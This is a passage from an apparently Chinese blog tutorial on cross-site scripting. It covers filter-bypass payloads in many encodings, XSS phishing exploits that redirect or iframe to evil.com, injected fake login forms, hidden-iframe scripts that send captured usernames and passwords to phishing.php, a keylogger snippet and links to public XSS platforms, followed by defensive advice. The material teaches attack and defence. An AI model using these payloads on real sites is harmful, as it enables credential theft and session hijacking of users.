<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="2、绕过过滤方法"><a href="#2、绕过过滤方法" class="headerlink" title="2、绕过过滤方法"></a>2、绕过过滤方法</h4><pre class="line-numbers language-javascript"><code class="language-javascript">过滤空格
<span class="token operator">&lt;</span>img<span class="token operator">/</span>src<span class="token operator">=</span><span class="token string">"x"</span><span class="token operator">/</span>onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">></span> #用<span class="token operator">/</span>代替空格
过滤关键字
<span class="token operator">&lt;</span>ImG sRc<span class="token operator">=</span>x onerRor<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">></span> #大小写绕过
双写关键字
<span class="token operator">&lt;</span>imimgg srsrcc<span class="token operator">=</span>x onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">"xss"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">></span> #有些waf可能会只替换一次且是替换为空，这种情况下可以用双写关键字绕过
字符拼接
<span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span><span class="token string">"a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)"</span><span class="token operator">></span>
<span class="token operator">&lt;</span>script<span class="token operator">></span>top<span class="token punctuation">[</span><span class="token string">"al"</span><span class="token operator">+</span><span class="token string">"ert"</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token template-string"><span class="token string">`xss`</span></span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span>
编码绕过
<span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span><span class="token string">"&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#34;&amp;#120;&amp;#115;&amp;#115;&amp;#34;&amp;#41;&amp;#59;"</span><span class="token operator">></span> #Unicode编码绕过
<span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span><span class="token string">"eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')"</span><span class="token operator">></span> #Unicode编码绕过
<span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span><span class="token string">"eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))"</span><span class="token operator">></span> #url编码绕过
<span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span><span class="token string">"eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))"</span><span class="token operator">></span> #Ascii码绕过
<span class="token operator">&lt;</span>img src<span class="token operator">=</span>x onerror<span class="token operator">=</span><span class="token function">eval</span><span class="token punctuation">(</span><span class="token string">'\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29'</span><span class="token punctuation">)</span><span class="token operator">></span> #hex绕过
<span class="token operator">&lt;</span>img src<span class="token operator">=</span>x onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'\170\163\163'</span><span class="token punctuation">)</span><span class="token operator">></span> #八进制
<span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span><span class="token string">"eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))"</span><span class="token operator">></span> #base64绕过
过滤双引号，单引号
<span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token template-string"><span class="token string">`xss`</span></span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">></span> #如果是html标签中，我们可以不用引号。如果是在js中，我们可以用反引号代替单双引号
过滤括号
<span class="token operator">&lt;</span>svg<span class="token operator">/</span>onload<span class="token operator">=</span><span class="token string">"window.onerror=eval;throw'=alert\x281\x29';"</span><span class="token operator">></span> #当括号被过滤的时候可以使用<span class="token keyword">throw</span>来绕过
过滤url地址
<span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span>document<span class="token punctuation">.</span>location<span class="token operator">=</span><span class="token template-string"><span class="token string">`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`</span></span><span class="token operator">></span> #url编码
使用IP
<span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span>document<span class="token punctuation">.</span>location<span class="token operator">=</span><span class="token template-string"><span class="token string">`http://2130706433/`</span></span><span class="token operator">></span> #十进制IP
使用中文逗号代替英文逗号
<span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">"x"</span> onerror<span class="token operator">=</span><span class="token string">"document.location=`http://www。baidu。com`"</span><span class="token operator">></span> #如果你在域名中输入中文句号浏览器会自动转化成英文的逗号
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="4、XSS-钓鱼的方式"><a href="#4、XSS-钓鱼的方式" class="headerlink" title="4、XSS 钓鱼的方式"></a>4、XSS 钓鱼的方式</h2><h4 id="水坑攻击-Watering-Hole"><a href="#水坑攻击-Watering-Hole" class="headerlink" title="水坑攻击(Watering Hole)"></a>水坑攻击(Watering Hole)</h4><p>“水坑攻击”，黑客攻击方式之一，顾名思义，是在受害者必经之路设置了一个“水坑(陷阱)”。最常见的做法是，黑客分析攻击目标的上网活动规律，寻找攻击目标经常访问的网站的弱点，先将此网站“攻破”并植入攻击代码，一旦攻击目标访问该网站就会“中招”；其针对的目标多为特定的团体（组织、行业、地区等）</p>
<h4 id="鱼叉式网络钓鱼-Spear-phishing"><a href="#鱼叉式网络钓鱼-Spear-phishing" class="headerlink" title="鱼叉式网络钓鱼(Spear phishing )"></a>鱼叉式网络钓鱼(Spear phishing )</h4><p>“鱼叉攻击”是黑客攻击方式之一，最常见的做法是，将木马程序作为电子邮件的附件，并起上一个极具诱惑力的名称，发送给目标电脑，诱使受害者打开附件，从而感染木马</p>
<h4 id="鲸钓攻击-Whaling-Attack"><a href="#鲸钓攻击-Whaling-Attack" class="headerlink" title="鲸钓攻击(Whaling Attack)"></a>鲸钓攻击(Whaling Attack)</h4><p>是鱼叉式钓鱼的一种，与CEO欺诈相反。攻击者的目的是高层管理人员，如CEO、CFO等，其目的是诱导高管输入敏感信息和公司数据</p>
<h4 id="CEO欺诈或商务邮件欺诈-BEC"><a href="#CEO欺诈或商务邮件欺诈-BEC" class="headerlink" title="CEO欺诈或商务邮件欺诈(BEC)"></a>CEO欺诈或商务邮件欺诈(BEC)</h4><p>假装公司的CEO或其他高管，向级别较低的员工(通常是会计或财务部门的员工)发送电子邮件，这些电子邮件的目的是获取商业机密信息或让受害者将资金转移到一个虚假账户</p>
<h4 id="克隆网络钓鱼"><a href="#克隆网络钓鱼" class="headerlink" title="克隆网络钓鱼"></a>克隆网络钓鱼</h4><p>利用受害者已经收到的合法信息，仿真创建一个恶意脚本，再以上一封电子邮件的链接有问题为由，要重新发送原始邮件，来诱导用户点击克隆的钓鱼邮件</p>
<h4 id="域欺骗-Pharming"><a href="#域欺骗-Pharming" class="headerlink" title="域欺骗(Pharming)"></a>域欺骗(Pharming)</h4><p>伪造一个新的电子邮件头，使它看起来像是来自一家合法公司的电子邮件地址。或者创建一个欺诈网站，让它的域名看上去是合法的或与合法公司的域名相似</p>
<h4 id="XSS-重定向钓鱼（XSS-Redirect-Phishing）"><a href="#XSS-重定向钓鱼（XSS-Redirect-Phishing）" class="headerlink" title="XSS 重定向钓鱼（XSS Redirect Phishing）"></a>XSS 重定向钓鱼（XSS Redirect Phishing）</h4><p>这种钓鱼方式是把当前页面重定向到一个钓鱼网站上。假如 <a href="https://link.zhihu.com/?target=http://www.bug.com">http://www.bug.com</a> 为漏洞网站，那么钓鱼网站 <a href="https://link.zhihu.com/?target=http://www.evil.com">http://www.evil.com</a>就会完全仿冒正常网站的页面内容及行为，从而进行钓鱼等诈骗活动 假设 <a href="https://link.zhihu.com/?target=http://www.bug.com">http://www.bug.com</a>上有一处 XSS： <a href="https://link.zhihu.com/?target=http://www.bug.com/index.php?search=">http://www.bug.com/index.php?search=</a>【Expliot】 那么， Exploit 如下： <a href="https://link.zhihu.com/?target=http://www.bug.com/index.php?search=">http://www.bug.com/index.php?search=</a>“‘&gt;document.location.href=”<a href="https://link.zhihu.com/?target=http://www.evil.com">http://www.evil.com</a>“ 这样便会让用户从当前访问的网站跳转到钓鱼网站</p>
<h4 id="HTML注入式钓鱼（XSS-HTML-Inject-Phishing）"><a href="#HTML注入式钓鱼（XSS-HTML-Inject-Phishing）" class="headerlink" title="HTML注入式钓鱼（XSS HTML Inject Phishing）"></a>HTML注入式钓鱼（XSS HTML Inject Phishing）</h4><p>HTML 注入式钓鱼是指直接利用 XSS 漏洞注射 HTML/JavaScript 代码到页面中 示例代码：</p>
<pre class="line-numbers language-javascript"><code class="language-javascript">http<span class="token punctuation">:</span><span class="token operator">/</span><span class="token operator">/</span>www<span class="token punctuation">.</span>bug<span class="token punctuation">.</span>com<span class="token operator">/</span>index<span class="token punctuation">.</span>php<span class="token operator">?</span>search<span class="token operator">=</span>
<span class="token operator">&lt;</span>html<span class="token operator">></span>
<span class="token operator">&lt;</span>head<span class="token operator">></span>
<span class="token operator">&lt;</span>title<span class="token operator">></span>login<span class="token operator">&lt;</span><span class="token operator">/</span>title<span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">/</span>head<span class="token operator">></span>
<span class="token operator">&lt;</span>body<span class="token operator">></span>
<span class="token operator">&lt;</span>div style<span class="token operator">=</span><span class="token string">"text-align: center;"</span><span class="token operator">></span>
<span class="token operator">&lt;</span>form Method<span class="token operator">=</span><span class="token string">"POST"</span> Action<span class="token operator">=</span><span class="token string">"phishing.php"</span> Name<span class="token operator">=</span><span class="token string">"form"</span><span class="token operator">></span>
<span class="token operator">&lt;</span>br<span class="token operator">/</span><span class="token operator">></span>Username<span class="token punctuation">:</span><span class="token operator">&lt;</span>br<span class="token operator">/</span><span class="token operator">></span><span class="token operator">&lt;</span>input name<span class="token operator">=</span><span class="token string">"Username"</span> <span class="token operator">/</span><span class="token operator">></span>
<span class="token operator">&lt;</span>br <span class="token operator">/</span><span class="token operator">></span>Password<span class="token punctuation">:</span><span class="token operator">&lt;</span>br<span class="token operator">/</span><span class="token operator">></span><span class="token operator">&lt;</span>input name<span class="token operator">=</span><span class="token string">"Password"</span> type<span class="token operator">=</span><span class="token string">"password"</span> <span class="token operator">/</span><span class="token operator">></span><span class="token operator">&lt;</span>br<span class="token operator">/</span><span class="token operator">></span>
<span class="token operator">&lt;</span>br <span class="token operator">/</span><span class="token operator">></span><span class="token operator">&lt;</span>input name<span class="token operator">=</span><span class="token string">"Valid"</span> value<span class="token operator">=</span><span class="token string">"login"</span> type<span class="token operator">=</span><span class="token string">"submit"</span> <span class="token operator">/</span><span class="token operator">></span><span class="token operator">&lt;</span>br<span class="token operator">/</span><span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">/</span>form<span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">/</span>div<span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">/</span>body<span class="token operator">></span>
<span class="token operator">&lt;</span><span class="token operator">/</span>html<span class="token operator">></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>这段代码会构造出一个登录表单，该表单可以覆盖原页面显示，用来窃取用户输入账号和密码等信息</p>
<h4 id="XSS-跨框架钓鱼（Iframe-Phishing）"><a href="#XSS-跨框架钓鱼（Iframe-Phishing）" class="headerlink" title="XSS 跨框架钓鱼（Iframe Phishing）"></a>XSS 跨框架钓鱼（Iframe Phishing）</h4><p>这种方式是通过标签嵌入远程域的一个页面实施钓鱼，利用 Iframe 引用第三方的内容伪造登录控件，此时主页面依然处在正常网站的域名下，因此具有很高的迷惑性 假设有一个 XSS： <a href="https://link.zhihu.com/?target=http://www.bug.com/index.php?search=">http://www.bug.com/index.php?search=</a>【Expliot】 那么，Exploit 如下： <a href="https://link.zhihu.com/?target=http://www.bug.com/index.php?search=">http://www.bug.com/index.php?search=</a>‘&gt;&lt;iframe src=“<a href="https://link.zhihu.com/?target=http://www.evil.com">http://www.evil.com</a>”height=”100%” width=”100%”&gt; Iframe 的效果可以做得很真实，可以跨框架覆盖整个页面</p>
<h4 id="Flash-钓鱼（Flash-Phishing）"><a href="#Flash-钓鱼（Flash-Phishing）" class="headerlink" title="Flash 钓鱼（Flash Phishing）"></a>Flash 钓鱼（Flash Phishing）</h4><p>Flash 钓鱼甚至不要求网站存在 XSS 漏洞，只要攻击者把精心构造的 Flash 文件（比如一个假冒的登录框）上传到远程服务器，然后在目标网站中使用或标签去引用 Flash 即可Flash 本身也存在许多的安全漏洞，包括 XSS、 CSRF 和跨域等问题，而且 Flash 也有内置的编程语言——ActionScript。ActionScript 与JavaScript、服务端编程语言一样都可以作为跨站攻击的一种辅助手段</p>
<h4 id="高级钓鱼技术"><a href="#高级钓鱼技术" class="headerlink" title="高级钓鱼技术"></a>高级钓鱼技术</h4><p>黑客利用 XSS 漏洞可以窃取用户会话的 Cookie，从而窃取网站用户的隐私数据，包括 MD5密码信息等。但是，如果网站使用了 Httponly 的 Cookie（将 Cookie 的属性设置为“<strong>Httponly</strong>”就<strong>可防止 Cookie 被恶意 JavaScript 脚本存取</strong>），或无法通过 Cookie 欺骗等方式侵入受害者的账户，那么窃取用户 Cookie 方法就显得英雄无用武之地</p>
<p> 这种情况下，黑客更青睐于直接获取用户的明文账户密码信息。这时候就要用到一些高级的XSS 钓鱼技术，而构成这些技术的主要元素无非是我们所熟知的JavaScript、Ajax 等 最简单、最直接的实现方法就是注入 JavaScript 脚本代码劫持 HTML 表单和控制 Web 的行为 JavaScript代码：</p>
<pre class="line-numbers language-html"><code class="language-html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span><span class="token script language-javascript"> 
  Form <span class="token operator">=</span> document<span class="token punctuation">.</span>forms<span class="token punctuation">[</span><span class="token string">"userslogin"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
  Form<span class="token punctuation">.</span>onsubmit <span class="token operator">=</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
    <span class="token keyword">var</span> iframe <span class="token operator">=</span> document<span class="token punctuation">.</span><span class="token function">createElement</span><span class="token punctuation">(</span><span class="token string">"iframe"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    iframe<span class="token punctuation">.</span>style<span class="token punctuation">.</span>display <span class="token operator">=</span> <span class="token string">"none"</span><span class="token punctuation">;</span> 
    <span class="token function">alert</span><span class="token punctuation">(</span>Form<span class="token punctuation">.</span>user<span class="token punctuation">.</span>value<span class="token punctuation">)</span><span class="token punctuation">;</span>
    iframe<span class="token punctuation">.</span>src <span class="token operator">=</span> <span class="token string">"http://127.0.0.1/phishing.php?user="</span><span class="token operator">+</span>Form<span class="token punctuation">.</span>user<span class="token punctuation">.</span>value <span class="token operator">+</span> <span class="token string">"&amp;pass="</span> <span class="token operator">+</span> Form<span class="token punctuation">.</span>pass<span class="token punctuation">.</span>value<span class="token punctuation">;</span>
    document<span class="token punctuation">.</span>body<span class="token punctuation">.</span><span class="token function">appendChild</span><span class="token punctuation">(</span>iframe<span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token punctuation">}</span> 
</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>这段代码用来截取用户在登录页面输入的用户名和密码信息，然后提交给当前创建的 PHP脚本 JavaScript代码：</p>
<pre class="line-numbers language-html"><code class="language-html"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span><span class="token script language-javascript"> 
  loginForm <span class="token operator">=</span> document<span class="token punctuation">.</span>forms<span class="token punctuation">[</span><span class="token string">' userslogin '</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
  <span class="token keyword">function</span> <span class="token function">parseData</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> 
    <span class="token keyword">var</span> user <span class="token operator">=</span> loginForm<span class="token punctuation">.</span>user<span class="token punctuation">.</span>value<span class="token punctuation">;</span>
    <span class="token keyword">var</span> pass <span class="token operator">=</span> loginForm<span class="token punctuation">.</span>pass<span class="token punctuation">.</span>value<span class="token punctuation">;</span>
    <span class="token function">saveData</span><span class="token punctuation">(</span>username<span class="token punctuation">,</span>password<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token keyword">return</span> <span class="token boolean">true</span><span class="token punctuation">;</span> 
  <span class="token punctuation">}</span> 
  <span class="token keyword">function</span> <span class="token function">saveData</span><span class="token punctuation">(</span>username<span class="token punctuation">,</span>password<span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">var</span> frame<span class="token operator">=</span>document<span class="token punctuation">.</span><span class="token function">createElement</span><span class="token punctuation">(</span><span class="token string">'iframe'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    frame<span class="token punctuation">.</span>src<span class="token operator">=</span><span class="token string">" http://127.0.0.1/phishing.php?user="</span> <span class="token operator">+</span> user <span class="token operator">+</span> <span class="token string">"&amp;pass="</span> <span class="token operator">+</span> pass<span class="token punctuation">;</span>
    frame<span class="token punctuation">.</span>style<span class="token punctuation">.</span>display<span class="token operator">=</span><span class="token string">'none'</span><span class="token punctuation">;</span>
    document<span class="token punctuation">.</span>body<span class="token punctuation">.</span><span class="token function">appendChild</span><span class="token punctuation">(</span>frame<span class="token punctuation">)</span><span class="token punctuation">;</span> 
  <span class="token punctuation">}</span> 
  loginForm<span class="token punctuation">.</span>onsubmit <span class="token operator">=</span> parseData<span class="token punctuation">;</span> 
</span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>如图 2-21 所示，在本地进行测试，用浏览器访问测试页面，然后输入一些信息并提交，处理程序便会获取和记录相关信息，如图 2-22 所示 </p>
<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304161706906.png" alt="img"></p>
<p><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304161706619.png" alt="img"></p>
<h4 id="劫持链接的-onclick-事件"><a href="#劫持链接的-onclick-事件" class="headerlink" title="劫持链接的 onclick 事件"></a>劫持链接的 onclick 事件</h4><pre class="line-numbers language-js"><code class="language-js"><span class="token keyword">for</span><span class="token punctuation">(</span>i<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">;</span>i<span class="token operator">&lt;</span>document<span class="token punctuation">.</span>links<span class="token punctuation">.</span>length<span class="token punctuation">;</span>i<span class="token operator">++</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
 document<span class="token punctuation">.</span>links<span class="token punctuation">[</span>i<span class="token punctuation">]</span><span class="token punctuation">.</span>onclick <span class="token operator">=</span> hijack<span class="token punctuation">;</span>
<span class="token punctuation">}</span> 
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h4 id="监听键盘-的onkeydown-事件"><a href="#监听键盘-的onkeydown-事件" class="headerlink" title="监听键盘 的onkeydown 事件"></a>监听键盘 的onkeydown 事件</h4><pre class="line-numbers language-js"><code class="language-js">document<span class="token punctuation">.</span>onkeydown<span class="token operator">=</span><span class="token keyword">function</span><span class="token punctuation">(</span>e<span class="token punctuation">)</span><span class="token punctuation">{</span> 
           <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span>e<span class="token punctuation">)</span>e<span class="token operator">=</span>window<span class="token punctuation">.</span>event<span class="token punctuation">;</span> 
              <span class="token keyword">try</span><span class="token punctuation">{</span><span class="token function">hijack</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">catch</span><span class="token punctuation">(</span>ex<span class="token punctuation">)</span><span class="token punctuation">{</span><span class="token punctuation">}</span>
<span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="JavaScript"><a href="#JavaScript" class="headerlink" title="JavaScript"></a>JavaScript</h4><p>键盘记录器捕获用户按下的特定键</p>
<pre class="line-numbers language-python"><code class="language-python"><span class="token operator">&lt;</span>script<span class="token operator">></span> 
function keyDown<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    var keycode <span class="token operator">=</span> event<span class="token punctuation">.</span>keyCode<span class="token punctuation">;</span>
    var realkey <span class="token operator">=</span> String<span class="token punctuation">.</span>fromCharCode<span class="token punctuation">(</span>event<span class="token punctuation">.</span>keyCode<span class="token punctuation">)</span><span class="token punctuation">;</span>
    alert<span class="token punctuation">(</span><span class="token string">"按键码: "</span> <span class="token operator">+</span> keycode <span class="token operator">+</span> <span class="token string">" 字符: "</span> <span class="token operator">+</span> realkey<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> 
document<span class="token punctuation">.</span>onkeydown <span class="token operator">=</span> keyDown<span class="token punctuation">;</span> 
<span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="5、危害"><a href="#5、危害" class="headerlink" title="5、危害"></a>5、危害</h2><p><strong>1、网络钓鱼、网站挂马、传播跨站脚本蠕虫等</strong><br><strong>2、盗用cookie，获取敏感信息 强制弹出广告页面、刷流量等</strong><br><strong>3、进行大量的客户端攻击，如 DDoS 攻击 进行恶意操作，例如任意篡改页面信息、删除文章等</strong><br><strong>4、获取客户端信息，例如用户的浏览历史、真实 IP、开放端口等</strong><br><strong>5、劫持用户会话，从而执行任意操作，例如进行非法转账、强制发表日志、发送电子邮件等</strong></p>
<h2 id="6、防御方法"><a href="#6、防御方法" class="headerlink" title="6、防御方法"></a>6、防御方法</h2><p><strong>XSS 攻击有两大要素： 1. 攻击者提交恶意代码。 2. 浏览器执行恶意代码。</strong></p>
<p>因此防御方法就由攻击面出发：</p>
<h3 id="1-预防-DOM-型-XSS-攻击"><a href="#1-预防-DOM-型-XSS-攻击" class="headerlink" title="1.预防 DOM 型 XSS 攻击"></a>1.预防 DOM 型 XSS 攻击</h3><p>DOM 型 XSS 攻击，实际上就是网站前端 JavaScript 代码本身不够严谨，把不可信的数据当作代码执行了。</p>
<p>因此在使用 <strong>.innerHTML、.outerHTML、document.write()<strong>时要特别小心，不要把不可信的数据作为 HTML 插到页面上，而应尽量使用</strong>.textContent、.setAttribute()</strong> 等。</p>
<p>DOM 中的内联事件监听器，如 location、onclick、onerror、onload、onmouseover等， 标签的href属性，JavaScript 的eval()、setTimeout()、setInterval()等，都能把字符串作为代码运行。如果不可信的数据拼接到字符串中传递给这些 API，很容易 产生安全隐患，务必避免。</p>
<h3 id="2-输入过滤"><a href="#2-输入过滤" class="headerlink" title="2.输入过滤"></a>2.输入过滤</h3><p>如果由前端过滤输入，然后提交到后端的话。一旦攻击者绕过前端过滤，直接构造请求，就可以提交恶意代码了，因此前端过滤并不可靠。</p>
<p>那么，换一个过滤时机：后端在写入数据库前，对输入进行过滤，然后把“安全的”内容，返回给前端。这样是否可行呢？ 我们举一个例子，一个正常的用户输入了 5 &lt; 7 这个内容，在写入数据库前，被转义，变成了 5 $lt; 7。 问题是：在提交阶段，我们并不确定内容要输出到哪里。</p>
<p>这里的“并不确定内容要输出到哪里”有两层含义：</p>
<p>​    1、用户的输入内容可能同时提供给前端和客户端，而一旦经过了 escapeHTML()，客户端显示的内容就变成了乱码( 5 $lt;7 )。</p>
<p>   2、 在前端中，不同的位置所需的编码也不同。 当 5 $lt;7 作为 HTML 拼接页面时，可以正常显示：5 &lt; 7</p>
<p><strong>所以输入过滤非完全可靠，我们就要通过“防止浏览器执行恶意代码”来防范 XSS，可采用下面的两种方法</strong></p>
<h3 id="3-前端渲染分离代码与数据"><a href="#3-前端渲染分离代码与数据" class="headerlink" title="3.前端渲染分离代码与数据"></a>3.前端渲染分离代码与数据</h3><p>在前端渲染中，我们明确的告诉浏览器：下面要设置的内容是文本（.innerText），还是属性（.setAttribute），还是样式 （.style）等等。浏览器不会被轻易的被欺骗，执行预期外的代码了。</p>
<p>​    1、Javascript：可以使用textContent或者innerText的地方，尽量不使用innerHTML；</p>
<p>​    2、query：可以使用text()得地方，尽量不使用html()；</p>
<h3 id="4-拼接HTML时对其进行转义"><a href="#4-拼接HTML时对其进行转义" class="headerlink" title="4.拼接HTML时对其进行转义"></a>4.拼接HTML时对其进行转义</h3><p>如果拼接 HTML 是必要的，就需要采用合适的转义库，对 HTML 模板各处插入点进行充分的转义。</p>
<p>常用的模板引擎，如 doT.js、ejs、FreeMarker 等，对于 HTML 转义通常只有一个规则，就是把 &amp; &lt; &gt; “ ’ / 这几个字符转义掉，确 实能起到一定的 XSS 防护作用，但并不完善：</p>
<p>推荐前端防止XSS攻击的插件: js-xss，Git 3.8K 的Star和60W的周下载量证明了其强大性.</p>
<h3 id="5、一般方法："><a href="#5、一般方法：" class="headerlink" title="5、一般方法："></a>5、一般方法：</h3><p>过滤危险字符 </p>
<p>设置httponly （<a target="_blank" rel="noopener" href="https://blog.csdn.net/desert3/article/details/83810559?ops_request_misc=%7B%22request_id%22:%22166761252916782388088132%22,%22scm%22:%2220140713.130102334..%22%7D&amp;request_id=166761252916782388088132&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-83810559-null-null.142%5Ev63%5Econtrol,201%5Ev3%5Eadd_ask,213%5Ev1%5Et3_control1&amp;utm_term=httponly%E9%98%B2%E6%AD%A2xss&amp;spm=1018.2226.3001.4187">https://blog.csdn.net/desert3/article/details/83810559?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522166761252916782388088132%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&amp;request_id=166761252916782388088132&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2<del>all</del>sobaiduend~default-1-83810559-null-null.142^v63^control,201^v3^add_ask,213^v1^t3_control1&amp;utm_term=httponly%E9%98%B2%E6%AD%A2xss&amp;spm=1018.2226.3001.4187</a>）</p>
<p>输入内容长度限制</p>
<p> HTML实体编码</p>
<h2 id="7、xss平台搭建"><a href="#7、xss平台搭建" class="headerlink" title="7、xss平台搭建"></a>7、xss平台搭建</h2><p><a href="https://link.zhihu.com/?target=http://xsspt.com">http://xsspt.com</a>（开放注册） <a href="https://link.zhihu.com/?target=https://xss8.cc">https://xss8.cc</a><a href="https://link.zhihu.com/?target=http://xss9.com">http://xss9.com</a>（需要邀请码）</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:1916003479@qq.com">uf9n1x</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://uf9n1x.top/2023/04/16/xss/">https://uf9n1x.top/2023/04/16/xss/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://uf9n1x.top">Uf9n1x's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/websec/">websec</a><a class="post-meta__tags" href="/tags/XSS/">XSS</a><a class="post-meta__tags" href="/tags/Redteam/">Redteam</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2023/04/16/xss-gong-fang-xiang-guan-han-shu/"><i class="fa fa-chevron-left">  </i><span>XSS攻防相关函数</span></a></div><div class="next-post pull-right"><a href="/2023/04/16/sql-labs-ba-chang/"><span>sql-labs靶场</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1313934826.cos.ap-chengdu.myqcloud.com/normal-images/psc.png#https://s1.ax1x.com/2023/04/14/p9Sd0ns.png)"><div class="layout" id="footer"><div class="copyright">&copy;2023 By uf9n1x</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span 